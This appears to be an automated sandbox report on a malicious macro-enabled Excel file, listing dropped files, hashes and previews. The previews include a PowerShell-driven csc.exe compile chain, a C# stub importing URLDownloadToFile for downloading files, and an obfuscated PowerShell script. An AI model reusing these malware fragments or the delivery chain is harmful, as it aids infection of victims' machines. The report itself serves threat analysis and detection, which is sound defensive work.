                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I[g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....u.....u.......................................... 9.....P ......K.........Q.....U.....`.....l.....n...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.5d
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                        Category:modified
                                                                        Size (bytes):866
                                                                        Entropy (8bit):5.360204976644024
                                                                        Encrypted:false
                                                                        SSDEEP:24:AId3ka6Kzwo1Eow3KaMD5DqBVKVrdFAMBJTH:Akka60wo1Eow3KdDcVKdBJj
                                                                        MD5:63985D460F073FD1A77BAFC21ED41DBA
                                                                        SHA1:84D71295808390D2D7BC0011728BDB571A858857
                                                                        SHA-256:75D29BCDBAD68B344B0D5F592AE5579CE9AE2A8E93A4FC9C39F97289503819AC
                                                                        SHA-512:CFB874B8E43055F40ECA661A3D642B82752F948E389F8581E816C31335AF7957C52D19C876391D36EE2CD15F69EA14BEF3FD9A5339723CC38D62E906B7679BA9
                                                                        Malicious:false
                                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:MSVC .res
                                                                        Category:dropped
                                                                        Size (bytes):652
                                                                        Entropy (8bit):3.1097838680619247
                                                                        Encrypted:false
                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7YnqqrPN5Dlq5J:+RI+ycuZhNtakSrPNnqX
                                                                        MD5:7CC975E9081363A13977733A4815019D
                                                                        SHA1:4AA1C3F0F0EF2B127B6E9165B2CED09A89C10597
                                                                        SHA-256:79BBF3D4E91E3AB5DD5B84FF991A9D47FD83BD77881882B21A1C2D21BED6D9BD
                                                                        SHA-512:E77087A38F0FFBD3CA5EA7809C37C446E93024B27269F088E378BA41464A387D92192101674D364249C2656133ABE43CC7AB5C55C485BA98106B3E23C5CA220B
                                                                        Malicious:false
                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.d.j.z.g.a.y.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.d.j.z.g.a.y.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Dec 12 20:38:23 2024, 1st section name ".debug$S"
                                                                        Category:dropped
                                                                        Size (bytes):1328
                                                                        Entropy (8bit):3.991971028129984
                                                                        Encrypted:false
                                                                        SSDEEP:24:HOe9EurRF0dH2wKdNWI+ycuZhNQlAakS5llPNnqSqd:7rc1Kd41ulQlAa35l/qSK
                                                                        MD5:C4F074AB40951B0E15189A4118185A28
                                                                        SHA1:18909D64B36B187F9F3F04DF85200BBB84EF6E69
                                                                        SHA-256:2CF05E55A2D813FA6A70305E16D4953808BB533566932BC6CF61D592D5225B6B
                                                                        SHA-512:BE1337BF3C7051B886113705184E476C717D4C3822249578D5432EA333F20E46F97B8129585214043B291EAC0351AD2CD6CB614806F6BC8EB8DCE780BBFA76CB
                                                                        Malicious:false
                                                                        Preview:L....I[g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP................~..(.d..M...5...........4.......C:\Users\user\AppData\Local\Temp\RES9ECF.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.l.w.y.f.s.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Dec 12 20:38:43 2024, 1st section name ".debug$S"
                                                                        Category:dropped
                                                                        Size (bytes):1328
                                                                        Entropy (8bit):3.994911326643504
                                                                        Encrypted:false
                                                                        SSDEEP:24:Hae9EurVcKZdHEYwKdNWI+ycuZhNtakSrPNnqSqd:HrVcKvknKd41ulta3BqSK
                                                                        MD5:2B7CEAD4AD7DB5FA436A22F472AB9343
                                                                        SHA1:44488E0676A10B4D880E78DEABFAF82301D13B59
                                                                        SHA-256:D294A5C8CB1574D799E16B0697575EDCAF7FA65A7777B710492973068E77229E
                                                                        SHA-512:91928397945B99C09D92E88323BC442B99D484D1794658ADF5E289E131821A8155F46D1C5A9EDED8CC4C2EB0EB741A29DA95D021F6FFB0B9E7240108A9F35AD4
                                                                        Malicious:false
                                                                        Preview:L....I[g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP................|.u...c.9ws:H.............4.......C:\Users\user\AppData\Local\Temp\RESEC91.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.d.j.z.g.a.y.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:MSVC .res
                                                                        Category:dropped
                                                                        Size (bytes):652
                                                                        Entropy (8bit):3.102910727387124
                                                                        Encrypted:false
                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryalAak7Ynqq5llPN5Dlq5J:+RI+ycuZhNQlAakS5llPNnqX
                                                                        MD5:7ED3E2289D647FC7974DC6D8978A35E8
                                                                        SHA1:3BA8FDC4538BBE396F840BB5D54EA41726E8316D
                                                                        SHA-256:DC6EB1EF04E60F93319A285981754616CA5655FAA40FD1E560AD526E6F79CB49
                                                                        SHA-512:A7E4AA4E5ED4D3A1D380258476C8D6E431FAE2F1BF39D791F41A077C9DFFF688252E2CCC29DA4CA71B838013236827170EAA3A0B9CDC6EBB2830B676540AC39B
                                                                        Malicious:false
                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.l.w.y.f.s.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.l.w.y.f.s.w.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
                                                                        Category:dropped
                                                                        Size (bytes):483
                                                                        Entropy (8bit):3.7055245437561335
                                                                        Encrypted:false
                                                                        SSDEEP:6:V/DsYLDS81zumywWHMGbjQXReKJ8SRHy4H1r3TbAc/uc4y:V/DTLDfu1wXfHRn8c6y
                                                                        MD5:567F2C2AF7886BD10A602EDEA0DBB33B
                                                                        SHA1:AAA2F286D79889F3AE9CD98B9B728F832A0981BD
                                                                        SHA-256:942B49DF85678ADA85046144CAC22EE63E865763EA87B1AB1AA56E86E8FE2DAC
                                                                        SHA-512:8CE20E4DFF36398AA1B520C2959907662216003C20085CC6ECF1E612E4005683B187AFBE423C3D7A3BDB7DA16995526894F264EC4094D3741573EEBC7FC35C4C
                                                                        Malicious:false
                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace eG.{. public class SrgpCje. {. [DllImport("urlmon.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr DQJ,string QDlMltZdCJ,string DmhIGJsMxfC,uint l,IntPtr CvkghJ);.. }..}.
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):369
                                                                        Entropy (8bit):5.23445730420697
                                                                        Encrypted:false
                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fJYTtD6n0zxs7+AEszIP23fJYTtDOH:p37Lvkmb6KzRYTtm0WZEoRYTtCH
                                                                        MD5:EDC82A4DF1AD5B8F414F1C16B3F1E6C5
                                                                        SHA1:74D717C7F2F292826A79634721982E7FD2680529
                                                                        SHA-256:BF03605E0AD62C4E93283AF54B49D5C2FA1B28C0624FB3B8C477FFA9614792DD
                                                                        SHA-512:ACAC66821322744D69AA9C1A8F2D6A4D2040D2AD3747CC40798F78AD7E8233146EB9A5EAD46DE66E012E47617E67592D76CF2EC6D005958EC97E71792C8DF89C
                                                                        Malicious:true
                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.0.cs"
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3072
                                                                        Entropy (8bit):2.8313598484732503
                                                                        Encrypted:false
                                                                        SSDEEP:48:67skr+vf3OCMevZJpzybCZX1ulQlAa35l/q:Eiv9Me1Ve+AK7
                                                                        MD5:47D74BE865E8A11E460237DF57CE6B17
                                                                        SHA1:91A03609E1936648A973437E15D15379C688AAC1
                                                                        SHA-256:E97739C1075A5A6A6A5D7C1BE6B1EAB701DA5E5C05215DF37E7764F3FDBAECA7
                                                                        SHA-512:5FB266EAC686BD31F69605976D1EFFB4B919E8D845A307926B21DA253DD7DCCDEBD21ABB550B3B18936BB51B91A1BB3A022433F2E4EE54DA798076B9EE0390AE
                                                                        Malicious:true
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I[g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....u.....u.......................................... 9.....P ......K.........Q.....U.....`.....l.....n...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.vl
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                        Category:modified
                                                                        Size (bytes):866
                                                                        Entropy (8bit):5.32774740951509
                                                                        Encrypted:false
                                                                        SSDEEP:24:AId3ka6KzR+t+EoR+tRKaMD5DqBVKVrdFAMBJTH:Akka60ct+EoctRKdDcVKdBJj
                                                                        MD5:3B8022DF7B0A05D53E005E13822600F7
                                                                        SHA1:012DA8FFC11DD2BE48CAA3B9BE03A94E37D4C596
                                                                        SHA-256:6188CED77F58F4EB6811FD02526B0F33C6C4B5F048E988B9213FE0FD0D6E708F
                                                                        SHA-512:5FE350450157B09C77B4A31B284B5CA25F3607D24414F0E96FD9BBBCC3FA5CA14C3C81D569D8A0664ACD6225D66CEB316DA70A560B564C443A4165CE7B0EC62E
                                                                        Malicious:false
                                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Dec 12 07:21:32 2024, Security: 1
                                                                        Category:dropped
                                                                        Size (bytes):1062912
                                                                        Entropy (8bit):7.737605200062142
                                                                        Encrypted:false
                                                                        SSDEEP:12288:u8+mzHJEUiOIBUzMTSpD3DERnLRmF8DdEPHxpsAQx1Zj+jQEPbbDSjIHfXtuVHVs:1Ba8bARM8kH8Z+j3OjIHfXWO7VmAL
                                                                        MD5:F2A40F8E4DB8F4DDE56B837425BBD03C
                                                                        SHA1:2965E39CC8A4279EA0B33E4F858B4E7929568E53
                                                                        SHA-256:9F709CA2B3C933B74F55D86264EFFA080F6D1E239439FF7480B685F651EB40D7
                                                                        SHA-512:01B4DD48D2FB4A6382EB5FC807DD860B6CFD49219DF1F570CF85861AEEA32866785DC75EEB07D50311E0128C98CDDD9BA0576B5A14916A172031D4A05BAA6167
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:......................>........................................................... ...!..."...O...P...Q..............._.......}...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N...\.......................$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3102), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):153774
                                                                        Entropy (8bit):3.794572563673094
                                                                        Encrypted:false
                                                                        SSDEEP:3072:rhOJJc6EynAswUs9Oau841fvkpWKj5fhOJJc6EynAswUs9Oau841fvkpWKjhhOJw:rOLEIpwPRs36WKJOLEIpwPRs36WKtOLs
                                                                        MD5:61BCBE69140CDEE35AC40F1D97773746
                                                                        SHA1:BB5D746ECA7A18890B642E6952EB9C5F71DEDAAA
                                                                        SHA-256:D68723EDCF3FF4F0C7DED177C7EEBD74DF498B8D16B111FAC54F1C11E37C93CF
                                                                        SHA-512:303EE3B3B8620F536C3E298BD65557BADF251870CA46656741C8D787A351F3ABCA94FE39BB701563AEF9C7C85F89BBDB447704E1F5BCE1B63701F575DB5E4B0B
                                                                        Malicious:true
                                                                        Preview:...... . . . .....c.U.U.O.W.U.v.z.v.f.n.p.h.B.m. .=. .".W.x.Q.e.K.L.L.v.b.W.N.b.v.Q.k.".....c.c.e.U.J.o.G.b.k.K.G.h.L.m.d. .=. .".G.W.L.z.L.p.e.L.W.t.O.U.i.G.K.".....r.K.W.i.K.P.K.W.q.W.W.e.N.c.W. .=. .".B.K.c.L.a.K.r.W.Z.i.K.h.W.A.p.".........a.o.k.l.L.q.d.L.a.p.i.s.W.c.G. .=. .".p.n.W.L.n.A.s.Q.e.n.Z.J.j.B.p.".....v.U.S.i.W.c.i.K.S.m.L.B.G.q.j. .=. .".f.p.b.K.K.P.m.n.e.k.k.L.W.u.k.".....i.U.c.A.W.u.I.L.K.S.K.U.L.u.j. .=. .".r.L.b.W.i.U.G.R.o.n.r.m.T.U.q.".....H.c.J.K.W.k.h.i.i.K.c.J.G.G.A. .=. .".G.k.s.Z.W.v.e.O.c.b.L.x.W.i.R.".....z.e.m.L.K.b.L.A.K.A.h.W.e.o.f. .=. .".C.p.i.W.z.G.W.d.c.s.K.N.o.l.K.".....x.L.p.x.i.K.L.o.o.L.m.u.t.m.h. .=. .".J.t.h.G.c.T.L.e.x.m.L.W.c.W.i.".....c.q.B.a.L.h.Z.U.I.C.N.h.K.b.l. .=. .".e.r.f.W.K.L.e.g.L.B.P.b.f.U.W.".....W.q.f.K.z.h.K.b.N.e.a.K.g.L.W. .=. .".x.W.L.f.W.G.i.C.G.C.q.k.c.e.c.".....q.K.I.k.b.p.t.p.b.C.W.U.K.G.u. .=. .".u.h.m.P.a.c.t.n.W.S.W.H.G.G.W.".....R.z.m.R.v.L.L.O.K.G.J.a.x.W.W. .=. .".u.c.a.z.B.e.l.o.Z.o.h.d.K.c.z.".....L.n.G.N.U.Z.T.m.
                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Dec 12 07:21:32 2024, Security: 1
                                                                        Entropy (8bit):7.737585452139877
                                                                        TrID:
                                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                        File name:Euro confirmation Sp.xls
                                                                        File size:1'062'912 bytes
                                                                        MD5:ee0c6a4698481c48bbc55b9a33589a54
                                                                        SHA1:2abeddd26326a6dd0511c67069b0b21837e047b1
                                                                        SHA256:65e15997e0ceb72609fc8a3c0cc0453ca08d98d16485163863325fba17bda28a
                                                                        SHA512:80305c92221c1157fb94d8c081eab056080d7588d40d43237dda61604e9ecd7fdf541e08a7636dba9e948e24a47804fd737721697a49598a8026fece1dddafa0
                                                                        SSDEEP:12288:z8jmzHJEUiOIBUzMTS9D3DERnLRmF8DEEPrxpsAQx1Zj+jJEPybDSjIHfXtuVHVs:HBacbARM8PL8Z+jETjIHfXWO7VmAL
                                                                        TLSH:C735F1E8B78DAB52D619423475F3939E1724AC03E902423736F8771D2AFB6D08943F96
                                                                        File Content Preview:........................>........................................................... ...!..."...O...P...Q..............._.......}..............................................................................................................................
                                                                        Icon Hash:276ea3a6a6b7bfbf
                                                                        Document Type:OLE
                                                                        Number of OLE Files:1
                                                                        Has Summary Info:
                                                                        Application Name:Microsoft Excel
                                                                        Encrypted Document:True
                                                                        Contains Word Document Stream:False
                                                                        Contains Workbook/Book Stream:True
                                                                        Contains PowerPoint Document Stream:False
                                                                        Contains Visio Document Stream:False
                                                                        Contains ObjectPool Stream:False
                                                                        Flash Objects Count:0
                                                                        Contains VBA Macros:True
                                                                        Code Page:1252
                                                                        Author:
                                                                        Last Saved By:
                                                                        Create Time:2006-09-16 00:00:00
                                                                        Last Saved Time:2024-12-12 07:21:32
                                                                        Creating Application:Microsoft Excel
                                                                        Security:1
                                                                        Document Code Page:1252
                                                                        Thumbnail Scaling Desired:False
                                                                        Contains Dirty Links:False
                                                                        Shared Document:False
                                                                        Changed Hyperlinks:False
                                                                        Application Version:786432
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                                        VBA File Name:Sheet1.cls
                                                                        Stream Size:977
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
